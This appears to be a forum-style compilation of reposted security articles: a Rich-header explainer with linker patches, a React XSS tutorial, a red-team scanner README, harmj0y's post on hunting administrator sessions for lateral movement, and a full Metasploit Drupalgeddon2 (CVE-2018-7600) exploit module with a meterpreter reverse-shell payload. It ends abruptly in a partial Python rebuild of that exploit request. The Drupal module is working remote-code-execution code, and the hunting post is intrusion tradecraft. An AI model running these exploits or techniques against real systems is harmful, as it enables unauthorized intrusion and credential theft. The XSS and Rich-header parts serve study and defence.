NOTE: The table above was compiled from various sources; it is not an exhaustive list.

BUILD NUMBERS DON'T ALWAYS MATCH REPORTED COMMAND LINE / VERSION RESOURCE VALUES!

As you can see, the build numbers don't always correspond to what is reported from the command line.
For example, cl.exe for Visual C++ 6.0 reports version 12.00.8804 for Service Packs 4 thru 6; however, the "@comp.id" value written to OBJ files is different for each service pack, such as 8799, 8966, 9044 and 9782 for SP4, SP5, SP5 (Processor Pack) and SP6 respectively. You can see the same pattern in Visual C++ 7.x. This allows for unique detection of each Service Pack.

PATCHING THE MICROSOFT LINKER:

Rather than using a tool (such as peupdate) to remove the "Rich" header on a per-executable basis, it is possible to "fix" the linker so that the "Rich" header is never written in the first place. It wasn't long after the "Rich" header's discovery became public that a linker patch appeared to prevent the structure from being written to the executable. This is a cleaner solution than manually zeroing-out each executable produced; however, a new patch is needed for each version of the linker. As an added bonus, patching reclaims the area originally occupied by the "Rich" header (usually offset 0x80) as the spot where the PE header will instead be placed. This can reduce the size of the executable, depending on the file alignment value passed to the linker. In August of 2005, there was a PE tutorial written by Goppit that briefly describes using a tool called Signature Finder to patch the Linker. This is a simple GUI tool that, when supplied the path to LINK.EXE, locates the RVA address of the CALL instruction for the routine which generates the "Rich" Header. Knowing where the "Rich" routine is invoked by the linker is the first step; how to patch is up to you. However, the traditional patch method is to NOP-out the ADD instruction following the CALL. To do this, load LINK.EXE in a disassembler or debugger and navigate to the location reported by the tool (adding a 0x400000 base address to the reported RVA).
If you have symbols loaded, you'll see disassembly similar to the following within the IMAGE::BuildImage() function:

0045F0A5 E8 56 45 FC FF     call ?UpdateCORPcons@@YGXXZ ; UpdateCORPcons(void)
0045F0AA 55                 push ebp ; struct IMAGE *
0045F0AB E8 30 D2 01 00     call ?UpdateSXdata@@YGXPAVIMAGE@@@Z ; UpdateSXdata(IMAGE *)
0045F0B0 8D 54 24 14        lea edx, [esp+448h+lpMem]
0045F0B4 52                 push edx
0045F0B5 55                 push ebp
0045F0B6 E8 45 A6 FF FF     call ?CbBuildProdidBlock@IMAGE@@AAEKPAPAX@Z ; IMAGE::CbBuildProdidBlock(void**) <--- BUILDS the "Rich" Header
0045F0BB 8B 8D 3C 02 00 00  mov ecx, [ebp+23Ch]
0045F0C1 03 C8              add ecx, eax ; <--- NOP this out!
0045F0C3 89 44 24 2C        mov [esp+448h+var_41C], eax
0045F0C7 89 8D 40 02 00 00  mov [ebp+240h], ecx
0045F0CD FF 15 BC 12 40 00  call ds:__imp___tzset

The "Rich" Header routine identified by the tool is named CbBuildProdidBlock(); we can now assume Microsoft internally refers to the "Rich" structure as the "Product ID Block". If the ADD instruction below it (address 0x45F0C1) is changed from bytes "03 C8" to "90 90" (NOPs), the linker still internally generates the structure, but because we've removed the instruction that advances the current file position, the PE header (which comes next in the image) overwrites the "Rich" structure. Problem solved, no information leak. If you don't want to run the Signature Finder tool, below is a table with patch address information for all of the publicly-released 6.xx and 7.xx Microsoft linkers. The location is for the "ADD ECX,EAX" instruction (bytes "03 C8"). To perform the patch, replace the ADD instruction with two NOP bytes ("90 90"). This can be done with the bytepatch tool using the following command line:

bytepatch -pa <address> link.exe 90 90

Replace <address> above with the value in the ADDRESS column below for whatever linker you are using.
VERSION             SHIPPED WITH              MD5                               SIZE    ADDRESS   FILE OFFSET
LINK.EXE 6.00.8168  MSVC 6.0 RTM,SP1,SP2      7b3d59dc25226ad2183b5fb3a0249540  462901  0x44551A  0x4551A
LINK.EXE 6.00.8447  MSVC 6.0 SP3,SP4,SP5,SP6  24323f3eb0d1afa112ee63b100288547  462901  0x445826  0x45826
LINK.EXE 7.00.9466  MSVC .NET 7.0 (2002) RTM  dbb5bf0ce85516c96a5cbdcc3d42a97e  643072  0x45CD82  0x5CD82
LINK.EXE 7.00.9955  MSVC .NET 7.0 (2002) SP1  2042a0f45768bc359a5c912d67ad0031  643072  0x45CD32  0x5CD32
LINK.EXE 7.10.3052  MSVC .NET Free Toolkit    8d7a69e96e4cc9c67a4a3bca1b678385  647168  0x45EA0F  0x5EA0F
LINK.EXE 7.10.3077  MSVC .NET 7.1 (2003)      4677d4806cd3566c24615dd4334a2d4e  647168  0x45EA0F  0x5EA0F
LINK.EXE 7.10.6030  MSVC .NET 7.1 (2003) SP1  59572e90b9fe958e51ed59a589f1e275  647168  0x45F0C1  0x5F0C1

Unfortunately, the Signature Finder tool only works with Microsoft linkers prior to and including Visual Studio .NET 7.1 (2003). RE analysis of the tool indicates that it searches for up to 4 possible linker signatures (all known linkers available at the time of the tool's release in 2004), so trying to patch a newer linker, such as the one that shipped with MSVC .NET 8.0 (2005), results in an error. However, manually finding the location using a disassembler is not difficult. I received an e-mail from icestudent with a method he uses to manually patch each Microsoft linker release from 8.0 and up. Here is a break-down of this method:

1. Ensure your symbol path is set correctly; then download symbols for the linker you want to patch; e.g.: symchk /v LINK.EXE
2. Open LINK.EXE with IDA Pro
3. Open the imports window, locate "_tzset", and go to it
4. Open the references for "_tzset" (CTRL-X) and go to the "IMAGE::BuildImage" reference (or the "IMAGE::GenerateWinMDFile" reference for CLR executables).
5. Around the "CALL _tzset" instruction, locate the "CALL IMAGE::CbBuildProdidBlock" instruction. In older versions of the linker it was closer and above "_tzset"; in modern versions it is below and quite far.
- If you don't have symbols, check all CALL instructions around "_tzset" and find the one where the referenced function begins with a call to "HeapAlloc"; this will be the "IMAGE::CbBuildProdidBlock()" function.
- After the "CALL IMAGE::CbBuildProdidBlock", you will see some code like "MOV reg, ...", "ADD reg, reg2", "MOV [mem], reg". NOP-out the second ADD instruction (or sometimes LEA), which is responsible for adjusting the PE offset in memory past the Rich signature.

If you don't use the method above, the table below contains the patch offsets for some post-MSVC 7.x linkers. Thanks goes to icestudent for this information!

32-BIT LINK.EXE

x86 VERSION   OFFSET    ORIGINAL BYTES  PATCH BYTES
8 SP1         0x6A382   03 D0           90 90
9 RTM         0x6A20F   03 C8           90 90
9 SP1         0x6BE7F   03 C8           90 90
10 B1         0x6CF50   03 C8           90 90
10 B2         0x75EED   03 D0           90 90
10 CTP        0x6C26D   03 C8           90 90
10 SP1        0x760AD   03 D0           90 90
11 RTM U1     0x235BF   03 CE           90 90
11 RTM        0x17AEF   03 CE           90 90
vc18 CTP2     0x31920   03 CB           90 90
vc18 PREVIEW  0x1B3D8   03 CF           90 90
vc18 RC1      0x27B43   03 CF           90 90
vc18 RTM      0x31168   03 CB           90 90

64-BIT LINK.EXE

x64 VERSION   OFFSET    ORIGINAL BYTES  PATCH BYTES
8 RTM         0x8157A   93              8B
8 SP1         0x80DAC   93              8B
9 RTM         0x78205   93              8B
9 SP1 KB      0x78CE1   8D 14 0E        90 90 90
9 SP1         0x78CE5   93              8B
10 B1         0x7A01F   93              8B
10 B2         0x7A09D   93              8B
10 SP1        0x7A06D   93              8B
11 RTM U1     0x136B5   03 D0           90 90
11 RTM        0x136B5   03 D0           90 90
vc18 CTP2     0xE22A    03 D0           90 90
vc18 PREVIEW  0x853D    03 D0           90 90
vc18 RC1      0xE684    03 D0           90 90
vc18 RTM      0xEF3A    03 D0           90 90

To patch using the offsets in the table above, use the following bytepatch command line, replacing <file-offset> and <patch-bytes> with the appropriate entry:

bytepatch -a <file-offset> link.exe <patch-bytes>

CONSPIRACY THEORIES:

When the public first became aware of the "Rich" header, the obvious encryption of this structure of unknown information made a lot of people nervous and suspicious.
Because Microsoft never officially confirmed the existence of this structure, their lack of transparency made a lot of developers assume the worst. Here you can have an identical-source program built on two different machines and end up with a slightly different executable, because the information contained within the "Rich" header was different. It is not surprising that people assumed Microsoft was embedding machine or otherwise personally identifiable information within the structure. These might include a NIC/MAC address, a CPU identifier, Windows registration information or even a unique GUID representing a particular installed instance of a Microsoft product or operating system.

In reality, the only things stored here are the build numbers for the Microsoft-specific tools responsible for a specific component in an executable module. The slightest difference in Visual Studio version, SDK version or 3rd-party libraries used will cause an alteration of the "Rich" header.

The PE/COFF specification defines a minimum file alignment of 512 bytes. Since this value leaves more than enough room for an executable's header section to fully contain the DOS and PE headers, there will always be leftover wasted space between the headers section and the subsequent section. Microsoft capitalized on this fact by inserting the "Rich" header in the padding space, since it wouldn't generally affect the final executable size one way or the other.

To Microsoft's credit, the "Rich" header offers invaluable debugging statistics about how a given executable was built. Because the Visual C/C++ compiler and linker command lines are probably among the most complex of any Microsoft product to date, not to mention the different versions of those tools available and the combinations of SDKs that can be used, a structure such as the "Rich" header being embedded within every executable could certainly save countless man-hours in debugging complex build environment problems.
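Since the structure's layout is publicly known from reverse-engineering work (referenced later in this article), decoding a "Rich" header takes only a short script. Here is a sketch in Python, assuming the commonly documented layout: "DanS" XORed with the key, three masked padding dwords, masked (comp.id, count) pairs, then the literal "Rich" followed by the key:

```python
import struct

def decode_rich_header(data):
    """XOR-decode a 'Rich' header found in raw PE bytes.

    Returns ([(comp_id, count), ...], xor_key) or None if no header is found.
    Assumed layout (per public reverse engineering, not official docs):
      'DanS'^key, 3 padding dwords ^key, (comp_id^key, count^key)*, 'Rich', key
    """
    end = data.find(b"Rich")
    if end == -1 or end + 8 > len(data):
        return None
    key = struct.unpack_from("<I", data, end + 4)[0]
    # Walk backwards, decoding one dword at a time until we hit 'DanS'.
    dwords = []
    pos = end - 4
    while pos >= 0:
        value = struct.unpack_from("<I", data, pos)[0] ^ key
        if value == 0x536E6144:  # 'DanS' as a little-endian dword
            break
        dwords.append(value)
        pos -= 4
    else:
        return None  # ran off the start of the buffer without finding 'DanS'
    dwords.reverse()
    entries = dwords[3:]  # skip the three masked padding dwords after 'DanS'
    return list(zip(entries[0::2], entries[1::2])), key
```

Each decoded pair is a tool "product id" (build/tool identifier) and the number of object files that tool contributed, which is exactly the debugging statistic discussed above.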
Did I mention Microsoft's internal build environment is among the most complex in the world? If Microsoft's case against the author of a virus hinged on the virus being created by a particular version of Visual Studio that matched the version on a confiscated machine, I guess the "Rich" header could be used as evidence to prove this fact, but probably not much more.

There are other useful reasons Microsoft might want to bury such a secret "fingerprint" within executables. If Microsoft could prove which versions of certain libraries were employed, this would help them assert intellectual property rights or even a redistribution license violation, as they could distinguish between public, beta and pre-release versions. If companies used beta versions of Microsoft tools or libraries to release executables to the public outside of a specific time period, Microsoft would now have a way to find out. The "Rich" header could also help ensure publicly released benchmark tests were done fairly on properly built, Microsoft-sanctioned executables. These reasons could have been a bigger deal at the time the "Rich" header was invented than they are today.

The problem was that Microsoft intentionally hid and encrypted this information. Since the structure doesn't officially exist, there isn't going to be an official way to disable it. Anyone who develops with Microsoft tools gets this structure crammed in their executable whether they like it or not. Failing to document this fact can be considered a questionable practice. However, once people realized Microsoft wasn't embedding personally identifiable information in their executables, the "Rich" header was no longer the hot topic it once was.
ORIGINS OF "RICH" AND "DANS" SEQUENCES:

According to a 2012 post on Daniel Pistelli's RCE Cafe blog, information from two people who claimed to have worked on the Microsoft Visual C++ team said the word "Rich" likely originated from "Richard Shupak", a Microsoft employee who worked in the research department and had a hand in the Visual C++ linker/library code base.

NOTE: Richard Shupak is listed as the author at the top of the file PSAPI.H in the Platform SDK. The PSAPI library (the NT "Process Status Helper" APIs) retrieves information about processes, modules and drivers.

"DanS" was likely attributed to employee "Dan Spalding", who presumably ran the linker team. I can vouch for the fact that there was a "Dan Spalding" employee working on the Visual C++ team around the turn of the century. Apparently their initials also show up in the MSF/PDB format!

CONCLUSION AND REFERENCES:

The first known public information about this structure goes back to at least July 7th, 2004 from the article, Things They Didn't Tell You About MS LINK and the PE Header, a loose specification authored by "lifewire". I've archived the article here, because it is no longer available at one of the original links. While the article was brief, it was densely packed with useful details, such as the layout of the "Rich" structure and how the checksum key is calculated. It is not mentioned how the author came to know such information, but information like this is usually leaked or derived from reverse engineering. At the end of the article, he attributes the "Dan^" sequence as being a reference to Microsoft employee "Dan Ruder", but the sequence was actually, and has always been, "DanS", so I think this conclusion is incorrect.

When I was writing the pelook tool and was looking to add minimal compiler signature detection, I initially stumbled upon Daniel Pistelli's excellent 2008 article, titled Microsoft's Rich Signature (undocumented).
This article describes what he discovered while reverse engineering Microsoft's linker. Pistelli's research was independent of lifewire's 2004 article, which was unknown to him at the time. Despite this, he arrived at the same conclusions.

Pistelli's article was the first I'd heard of such a structure. I was surprised to learn of its existence and that it had been right under my nose all of those years. I was even more surprised that further information (official or unofficial) was not available. My goal in writing this article was to fill in some of the gaps of information not previously available, such as how far back Microsoft's linker has had support for the "Rich" structure and how it changed between different versions of Visual Studio.

Other links I found useful:

- A tutorial from 2010 that was based on the original "lifewire" article.
- A posting on asmcommunity
- A posting on trendystephen

<END OF ARTICLE>

Sursa: http://bytepointer.com/articles/the_microsoft_rich_header.htm
-
Ron Perris
Apr 15

Avoiding XSS in React is Still Hard

Introduction

I’ve spent the last few weeks thinking about React from a secure coding perspective. Since React is a library for creating component-based user interfaces, most of the attack surface is related to issues with rendering elements in the DOM. The smart folks over at Facebook have handled this by building automatic escaping into the React DOM library code.

Built-in Escaping is Limited

The escaping code in React DOM works great when you are passing a string value into [...children]. Notice the other two arguments to React.createElement, type and [props]: values passed into them are unescaped.

// From https://reactjs.org/docs/react-api.html#createelement
React.createElement(
  type,
  [props],
  [...children]
)

Data Passed as Props is Unescaped

When you pass data into a React element via props, the data is not escaped before being rendered into the DOM. This means that an attacker can control the raw values inside of HTML attributes. A classic XSS attack is to put a URL with a javascript: protocol into the href value of an anchor tag. When a user clicks on the anchor tag, the browser will execute the JavaScript found in the href attribute value.

// Classic XSS via anchor tag href attribute.
<a href="javascript: alert(1)">Click me!</a>

This classic XSS attack still works in React when rendering a component with React DOM.

// Classic XSS via anchor tag href attribute in a React component.
ReactDOM.render(
  <a href="javascript: alert(1)">Click me!</a>,
  document.getElementById('root')
)

Mitigating XSS Attacks on React Props

There are a few options for mitigating attacks on React components. You could do contextual escaping for the prop value. You would need a list of known bad values for each attribute, and you would need to know which characters to escape to make the value benign. Historically this hasn’t gone very well. You could also try filtering, which also hasn’t gone very well in the past.
For prop values you probably want to use validation. Here is a common attempt at avoiding XSS with blacklist-style validation.

const URL = require('url-parse')
const url = new URL(attackerControlled)

function isSafe(url) {
  if (url.protocol === 'javascript:') return false
  return true
}

isSafe(URL('javascript: alert(1)')) // Returns false
isSafe(URL('http://www.reactjs.org')) // Returns true

This approach seems to work, but as we will see shortly it will only prevent simple attacks that don’t attempt to evade the blacklist.

Validating Against a Blacklist is Hard

In the example above we are doing a lot of things right. We are using the npm module called url-parse to parse the URL instead of hand-rolling a solution. We are attempting to validate the URL with an isolated, reusable function, so that our security audits and remediation tasks will be easier. We are handling the failure case first in the function and using an early-return strategy.

It is usually a bad idea to use blacklists to enforce validation. Here we can defeat the isSafe function using our spacebar.

const URL = require('url-parse')

function isSafe(url) {
  if (url.protocol === 'javascript:') return false
  return true
}

isSafe(URL(' javascript: alert(1)')) // Returns true
isSafe(URL('http://www.reactjs.org')) // Returns true

Reading npm Module Documentation is Hard (Not Joking)

The reason that isSafe(URL(' javascript: alert(1)')) doesn’t work as intended is described in the documentation page for url-parse over on npm:

baseURL (Object | String): An object or string representing the base URL to use in case url is a relative URL. This argument is optional and defaults to location in the browser.

So when we pass the string javascript: alert(1) with a leading space, I think url-parse assumes we are providing a relative URL and it is happy to assume the protocol from the browser’s location. In this case it believes the protocol for javascript: alert(1) is http:.
const URL = require('url-parse')
URL(' javascript: alert(1)').protocol // Returns http:

If we look further down in the documentation for url-parse on npm we will find this part:

Note that when url-parse is used in a browser environment, it will default to using the browser's current window location as the base URL when parsing all inputs. To parse an input independently of the browser's current URL (e.g. for functionality parity with the library in a Node environment), pass an empty location object as the second parameter:

It tells us that if we pass an empty location object as the second parameter to url-parse, we can disable the behavior that causes all strings to be treated as having the browser’s location protocol as their protocol.

const URL = require('url-parse')
URL(' javascript: alert(1)', {}).protocol // Returns ""

With an empty object as the second argument, we can see that we get an empty string back as the protocol for javascript: alert(1).

Fixing that Blacklist Function

Looking back at the isSafe(url) blacklist function, we can improve it by looking for empty strings in addition to the javascript: protocol.

const URL = require('url-parse')
const url = new URL(attackerControlled)

function isSafe(url) {
  if (url.protocol === 'javascript:') return false
  if (url.protocol === '') return false
  return true
}

isSafe(URL('javascript: alert(1)', {})) // Returns false
isSafe(URL('http://www.reactjs.org')) // Returns true

Oh yeah, this is a post about React XSS security. Let’s get back to that now. We can try to use our improved isSafe function to do some validation in a React component.
import React, { Component } from 'react'
import ReactDOM from 'react-dom'
import URL from 'url-parse'

class SafeURL extends Component {
  isSafe(dangerousURL, text) {
    const url = URL(dangerousURL, {})
    if (url.protocol === 'javascript:') return false
    if (url.protocol === '') return false
    return true
  }

  render() {
    const dangerousURL = this.props.dangerousURL
    const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null
    return <a href={safeURL}>{this.props.text}</a>
  }
}

ReactDOM.render(
  <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />,
  document.getElementById('root')
)

This example above is not injectable, maybe.

Whitelist Validation

I’ve never felt very comfortable with blacklist-based solutions for security. It would be like if you heard a noise in your house at night, went downstairs to find an unfamiliar person standing in your living room, and in order to figure out if they belonged in your house you looked them up in a criminal offenders database. I prefer whitelist-based solutions. I know who is supposed to be in my house.

import React, { Component } from 'react'
import ReactDOM from 'react-dom'
const URL = require('url-parse')

class SafeURL extends Component {
  isSafe(dangerousURL, text) {
    const url = URL(dangerousURL, {})
    if (url.protocol === 'http:') return true
    if (url.protocol === 'https:') return true
    return false
  }

  render() {
    const dangerousURL = this.props.dangerousURL
    const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null
    return <a href={safeURL}>{this.props.text}</a>
  }
}

ReactDOM.render(
  <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />,
  document.getElementById('root')
)

Sursa: https://medium.com/javascript-security/avoiding-xss-in-react-is-still-hard-d2b5c7ad9412
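The same whitelist idea carries over outside of React. Here is a rough Python analogue using the standard library — note that urllib.parse behaves differently from url-parse in the corner cases above, so this illustrates the allow-list pattern rather than porting the component:

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def safe_url(dangerous_url):
    """Return the URL unchanged only if its scheme is explicitly allowed;
    anything else (javascript:, data:, scheme-less tricks) yields None."""
    scheme = urlsplit(dangerous_url.strip()).scheme.lower()
    return dangerous_url if scheme in ALLOWED_SCHEMES else None

safe_url("http://www.reactjs.org")   # returns the URL
safe_url(" javascript: alert(1)")    # returns None
```

Whether the parser treats the leading-space variant as having scheme "javascript" or no scheme at all, the allow-list rejects it either way, which is exactly why allow-lists hold up better than blacklists here.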
-
Red Team Arsenal

Red Team Arsenal is a web/network security scanner which has the capability to scan all of a company's online-facing assets and provide a holistic security view of any security anomalies. It's a closely linked collection of security engines built to conduct/simulate attacks and monitor public-facing assets for anomalies and leaks. It's an intelligent scanner detecting security anomalies in all layer 7 assets and gives a detailed report, with integration support for Nessus. As companies continue to expand their footprint on the Internet via various acquisitions and geographical expansions, human-driven security engineering is not scalable; hence, companies need feedback-driven automated systems to stay put.

Installation

Supported Platforms

RTA has been tested both on Ubuntu/Debian (apt-get based distros) and on Mac OS. It should ideally work with any Linux-based distribution with Mongo and Python installed (install the required Python libraries from install/py_dependencies manually).

Prerequisites:

There are a few packages which are necessary before proceeding with the installation:

- Git client: sudo apt-get install git
- Python 2.7, which is installed by default in most systems
- Python pip: sudo apt-get install python-pip
- MongoDB: Read the official installation guide to install it on your machine.

Finally run python install/install.py

There are also optional packages/tools you can install (highly recommended):

Sursa: https://github.com/flipkart-incubator/RTA
-
“I Hunt Sys Admins”

Published January 19, 2015 by harmj0y

[Edit 8/13/15] – Here is how the old version 1.9 cmdlets in this post translate to PowerView 2.0:

Get-NetGroups -> Get-NetGroup
Get-UserProperties -> Get-UserProperty
Invoke-UserFieldSearch -> Find-UserField
Get-NetSessions -> Get-NetSession
Invoke-StealthUserHunter -> Invoke-UserHunter -Stealth
Invoke-UserProcessHunter -> Invoke-ProcessHunter -Username X
Get-NetProcesses -> Get-NetProcess
Get-UserLogonEvents -> Get-UserEvent
Invoke-UserEventHunter -> Invoke-EventHunter

[Note] This post is a companion to the Shmoocon ’15 Firetalks presentation I gave, also appropriately titled “I Hunt Sys Admins”. The slides are here and the video is up on Irongeek. Big thanks to Adrian, @grecs and all the other organizers, volunteers, and sponsors for putting on a cool event!

[Edit] I gave an expanded version of my Shmoocon talk at BSides Austin 2015; the slides are up here.

One of the most common problems we encounter on engagements is tracking down where specific users have logged in on a network. If you’re in the lateral spread phase of your assessment, this often means gaining some kind of desktop/local admin access and performing the Hunt -> pop box -> Mimikatz -> profit pattern. Other times you may have domain admin access, and want to demonstrate impact by doing something like owning the CEO’s desktop or email. Knowing what users log in to what boxes from where can also give you a better understanding of a network layout and implicit trust relationships.

This post will cover various ways to hunt for target users on a Windows network. I’m taking the “assume compromise” perspective, meaning that I’m assuming you already have a foothold on a Windows domain machine. I’ll cover the existing prior art and tradecraft (that I know of) and then will show some of the efforts I’ve implemented with PowerView.
I really like the concept of “Offense in Depth“ – in short, it’s always good to have multiple options in case you hit a snag at some step in your attack chain. PowerShell is great, but you always need to have backups in case something goes wrong.

Existing Tools and Tradecraft

The Sysinternals tool psloggedon.exe has been around for several years. It “…determines who is logged on by scanning the keys under the HKEY_USERS key” as well as using the NetSessionEnum API call. Admins (and hackers) have used this official Microsoft tool for years. One note: some of its functionality requires admin privileges on the remote machine you’re enumerating.

Another “old school” tool we’ve used in the past is netsess.exe, part of the joeware utilities. It also takes advantage of the NetSessionEnum call, and doesn’t need administrative privileges on a remote host. Think of a “net session” that works on remote machines.

PVEFindADUser.exe is a tool released by the awesome @corelanc0d3r in 2009. Corelanc0d3r talks about the project here. It can help you find AD users, including enumerating the last logged-in user for a particular system. However, you do need to have admin access on machines you’re running it against.

Rob Fuller (@mubix’s) netview.exe project is a tool we’ve used heavily since its release at Derbycon 2012. It’s a tool to “enumerate systems using WinAPI calls”. It utilizes NetSessionEnum to find sessions, NetShareEnum to find shares, and NetWkstaUserEnum to find logged-on users. It can now also check share access, highlight high-value users, and use a delay/jitter. You don’t need administrative privileges to get most of this information from a remote machine.

Nmap’s flexible scripting engine also gives us some options. If you have a valid domain account, or a local account valid for several machines, you can use smb-enum-sessions.nse to get remote session information from a remote box. And you don’t need admin privileges!
If you have access to a user’s internal email, you can also glean some interesting information from internal email headers. Search for any chains to/from target users, and check the headers of any given email chain. The “X-Originating-IP” header is often present, and can let you trace where a user sent a given email from.

Scott Sutherland (@_nullbind) wrote a post in 2012 highlighting a few other ways to hunt for domain admin processes. Check out techniques 3 and 4, where he details other ways to scan remote machines for specific process owners, as well as how to scan for NetBIOS information of interest using nbtscan. For remote task listings, you’ll need local administrator permissions on the targets you’re going after. We’ll return to this in the PowerShell section.

And finally, Smbexec has a checkda module which will check systems for domain admin processes and/or logins. Veil-Pillage takes this a step further with its user_hunter and group_hunter modules, which can give you flexibility beyond just domain admins. For both Smbexec and Veil-Pillage, you will need admin rights on the remote hosts.

Active Directory: It’s a Feature!

Active Directory is an awesome source of information from both offensive and defensive perspectives. One of the biggest turning points in the evolution of my tradecraft was when I began to learn just how much information AD can give up. Various user fields in Active Directory can give you some great starting points to track down users. The homeDirectory property, which contains the path to a user’s auto-mounted home drive, can give you a good number of file servers. The profilePath property, which contains a user’s roaming profile, can also sometimes give you a few servers to check out as well. Try running something like netsess.exe or netview.exe against these remote servers. The key here is that you’re using AD information to identify servers that several users are likely connected to.
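The homeDirectory trick above is easy to automate: once you've dumped the property values (e.g. with PowerView), collapsing them into a target server list is just a bit of UNC-path parsing. A quick Python sketch — the paths and function name are made-up examples, not part of any of the tools discussed here:

```python
def extract_servers(unc_paths):
    """Collect the unique server names from UNC paths like \\FILESRV01\home\alice."""
    servers = set()
    for path in unc_paths:
        if path and path.startswith(r"\\"):       # UNC paths only
            parts = path.strip("\\").split("\\")  # "\\" is one backslash char
            if parts and parts[0]:
                servers.add(parts[0].lower())
    return servers

extract_servers([
    r"\\FILESRV01\home\alice",
    r"\\filesrv01\home\bob",    # same server, different case
    r"\\NAS02\profiles\carol",
    r"C:\localprofile",         # not a UNC path, ignored
])
# -> {'filesrv01', 'nas02'}
```

The resulting set is exactly the list of file servers worth pointing netsess.exe or netview.exe at.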
And the best part is, you don’t need any elevated privileges to query this type of user information!

Also, Scott wrote another cool post early in 2014 on using service principal names to find locations where domain admin accounts might be. In short, you can use Scott’s Get-SPN PowerShell script to enumerate all servers where domain admins are registered to run services. I highly recommend checking it out for some more information. This is also something that the prolific Carlos Perez talked about at Derbycon 2014.

Once you get domain admin, but still want to track down particular users, Windows event logs can be a great place to check as well. One of my colleagues (@sixdub) wrote a great post on offensive event parsing for the purposes of user hunting. We’ll return to this as well shortly.

PowerShell PowerShell PowerShell

Anyone who’s read this blog or seen me speak knows that I won’t shut up about PowerShell, Microsoft’s handy post-exploitation language. PowerShell has some awesome AD hooks and various ways to access the lower-level Windows API. @mattifestation has written about several ways to interact with the Windows API through PowerShell here, here, and here. His most recent release with PSReflect makes it super easy to play with this lower-level access. This is something I’ve written about before.

PowerView is a PowerShell situational-awareness tool I’ve been working on for a while that includes a few functions that help you hunt for users. To find users to target, Get-NetGroups *wildcard* will return groups containing specific wildcard terms. Also, Get-UserProperties will extract all user property fields, and Invoke-UserFieldSearch will search particular user fields for wildcard terms. This can sometimes help you narrow down which users to hunt for.
For example, we’ve used these functions to find the Linux administrators group and its associated members, so we could then hunt them down and keylog their PuTTY/SSH sessions.

The Invoke-UserHunter function can help you hunt for specific users on the domain. It accepts a username, userlist, or domain group, and accepts a host list or queries the domain for available hosts. It then runs Get-NetSessions and Get-NetLoggedon against every server (using those NetSessionEnum and NetWkstaUserEnum API functions) and compares the results against the resulting target user set. Everything is flexible, letting you define who to hunt for and where. Again, admin privileges are not needed.

Invoke-StealthUserHunter can get you good coverage with less traffic. It issues one query to get all users in the domain, extracts all servers from user.HomeDirectories, and runs Get-NetSessions against each resulting server. As you aren’t touching every single machine like with Invoke-UserHunter, this traffic will be more “stealthy”, but your machine coverage won’t be as complete. We like to use Invoke-StealthUserHunter as a default, falling back to its noisier brother if we can’t find what we need.

A recently added PowerView function is Invoke-UserProcessHunter. It utilizes the newly christened Get-NetProcesses cmdlet to enumerate the process/tasklists of remote machines, searching for target users. You will need admin access to the machines you’re enumerating.

The last user-hunting function in PowerView is the weaponized version of @sixdub’s post described above. The Get-UserLogonEvents cmdlet will query a remote host for logon events (ID 4624). Invoke-UserEventHunter wraps this up into a method that queries all available domain controllers for logon events linked to a particular user. You will need domain admin access in order to query these events from a DC.

If I missed any tools or approaches, please let me know!

Sursa: http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Drupalgeddon2',
      'Description'    => %q{
        CVE-2018-7600 / SA-CORE-2018-002
        Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x
        before 8.5.1 allows remote attackers to execute arbitrary code because
        of an issue affecting multiple subsystems with default or common module
        configurations.

        The module can load msf PHP arch payloads, using the php/base64 encoder.

        The resulting RCE on Drupal looks like this:
        php -r 'eval(base64_decode(#{PAYLOAD}));'
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Vitalii Rudnykh',  # initial PoC
        'Hans Topo',        # further research and ruby port
        'José Ignacio Rojo' # further research and msf module
      ],
      'References'     => [
        ['SA-CORE', '2018-002'],
        ['CVE', '2018-7600'],
      ],
      'DefaultOptions' => {
        'encoder' => 'php/base64',
        'payload' => 'php/meterpreter/reverse_tcp',
      },
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => [ARCH_PHP],
      'Targets'        => [
        ['User register form with exec', {}],
      ],
      'DisclosureDate' => 'Apr 15 2018',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
      ])

    register_advanced_options(
      [
      ])
  end

  def uri_path
    normalize_uri(target_uri.path)
  end

  def exploit_user_register
    data = Rex::MIME::Message.new
    data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"')
    data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"')
    data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"')
    data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"')
    data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"')
    post_data = data.to_s

    # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
    send_request_cgi({
      'method'   => 'POST',
      'uri'      => "#{uri_path}user/register",
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data,
      'vars_get' => {
        'element_parents' => 'account/mail/#value',
        'ajax_form'       => '1',
        '_wrapper_format' => 'drupal_ajax',
      }
    })
  end

  ##
  # Main
  ##
  def exploit
    case datastore['TARGET']
    when 0
      exploit_user_register
    else
      fail_with(Failure::BadConfig, "Invalid target selected.")
    end
  end
end

Sursa: https://www.exploit-db.com/exploits/44482/
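To make the request shape concrete, here is a rough Python reconstruction of the multipart body the module builds with Rex::MIME::Message. The field names and values are taken from the module; the boundary format and exact framing are assumptions for illustration, not a byte-exact copy of Rex's output:

```python
import uuid

def build_drupalgeddon2_body(command):
    """Build a multipart/form-data body with the five fields the exploit
    posts to /user/register (boundary format is a made-up placeholder)."""
    boundary = "----MsfBoundary" + uuid.uuid4().hex[:12]
    fields = [
        ("mail[#markup]", command),          # the shell command to run
        ("mail[#type]", "markup"),
        ("form_id", "user_register_form"),
        ("_drupal_ajax", "1"),
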